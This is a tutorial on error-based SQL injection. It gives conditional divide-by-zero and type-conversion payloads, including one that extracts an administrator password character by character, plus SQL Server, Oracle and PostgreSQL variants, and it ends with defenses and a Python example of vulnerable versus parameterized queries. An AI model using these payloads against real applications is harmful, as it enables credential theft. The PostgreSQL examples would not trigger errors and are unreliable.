
Error-Based SQL Injection

Error-based SQL Injection exploits database error messages to extract data or infer information, even in blind scenarios. This technique relies on carefully crafted queries that generate informative error messages.

Exploitation Methods

1. Conditional Error Triggering

Force a database error only when a boolean condition holds. Whether the application's response changes when the error fires reveals whether the condition was true, and repeating the test extracts data.

-- No error if condition is false
xyz' AND (SELECT CASE
WHEN (1=2) THEN 1/0
ELSE 'a'
END)='a
-- Triggers error if condition is true
xyz' AND (SELECT CASE
WHEN (1=1) THEN 1/0
ELSE 'a'
END)='a

Example Attack

-- Extract password character by character
xyz' AND (SELECT CASE
WHEN (Username = 'Administrator'
AND SUBSTRING(Password, 1, 1) > 'm')
THEN 1/0
ELSE 'a'
END FROM Users)='a

2. Verbose Error Message Exploitation

Identifying Injectable Parameters

Example error message revealing query structure:

Unterminated string literal started at position 52 in SQL
SELECT * FROM tracking WHERE id = '''. Expected char

Data Type Conversion Errors

-- Force type conversion error to reveal data
CAST((SELECT username FROM users) AS int)
-- Example error output:
ERROR: invalid input syntax for type integer: "admin_user"

Advanced Techniques

1. Error Stacking

-- Multiple conditions in single query
xyz' AND (SELECT CASE
WHEN (condition1) THEN 1/0
WHEN (condition2) THEN 2/0
ELSE 'a'
END)='a

2. Database-Specific Techniques

Microsoft SQL Server

-- Using convert()
AND 1=CONVERT(int, (SELECT top 1 username FROM users))
-- Using a divide-by-zero inside a CASE expression
AND 1=1/(SELECT TOP 1 CASE WHEN (1=1) THEN 1/0 ELSE 1 END FROM users)

Oracle

-- Using CTXSYS.DRITHSX.SN
SELECT CTXSYS.DRITHSX.SN(user, (SELECT password FROM users))
-- Using XMLType
SELECT XMLType('<?xml version="1.0"?><root>' ||
(SELECT password FROM users) || '</root>')

PostgreSQL

-- Using encode()
SELECT encode((SELECT password FROM users), 'base64')
-- Using string concatenation
SELECT 'data:' || (SELECT password FROM users)

Defense Strategies

  1. Stop verbose error reporting
  2. Implement proper error handling
  3. Review application logs
  4. Patch vulnerable code
  5. Update security controls
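
Items 1, 2 and 4 above, as an added example that is not code from the original page: a lookup handler that concatenates input and echoes the database error, beside a version that binds the parameter, logs the detail server-side and returns a generic message. The `tracking` table mirrors the error message quoted earlier; the SQLite backend, function names and sample row are assumptions constructed for illustration.

```python
import logging
import sqlite3

log = logging.getLogger("tracking")
GENERIC_ERROR = "An internal error occurred."


def make_db():
    """Constructed in-memory database standing in for the application's."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tracking (id TEXT PRIMARY KEY, visits INTEGER)")
    db.execute("INSERT INTO tracking VALUES ('xyz', 3)")
    return db


def lookup_vulnerable(db, tracking_id):
    """Concatenates input into SQL and echoes the database error to the client."""
    sql = "SELECT visits FROM tracking WHERE id = '" + tracking_id + "'"
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error as exc:
        # Verbose error: discloses the parser message and the full query text.
        return 500, f"{exc} in SQL {sql}"
    return 200, (str(row[0]) if row else "not found")


def lookup_hardened(db, tracking_id):
    """Binds input as a parameter; error detail is logged server-side only."""
    try:
        row = db.execute(
            "SELECT visits FROM tracking WHERE id = ?", (tracking_id,)
        ).fetchone()
    except sqlite3.Error:
        log.exception("tracking lookup failed")  # detail stays in the log
        return 500, GENERIC_ERROR
    # A quote in the input is just data here, so it yields an ordinary miss.
    return 200, (str(row[0]) if row else "not found")


if __name__ == "__main__":
    db = make_db()
    for handler in (lookup_vulnerable, lookup_hardened):
        for value in ("xyz", "'"):
            print(handler.__name__, repr(value), handler(db, value))
```

The log entry written by `lookup_hardened` is also the record that item 3 (reviewing application logs) depends on: the error detail is kept for defenders while the client sees none of it.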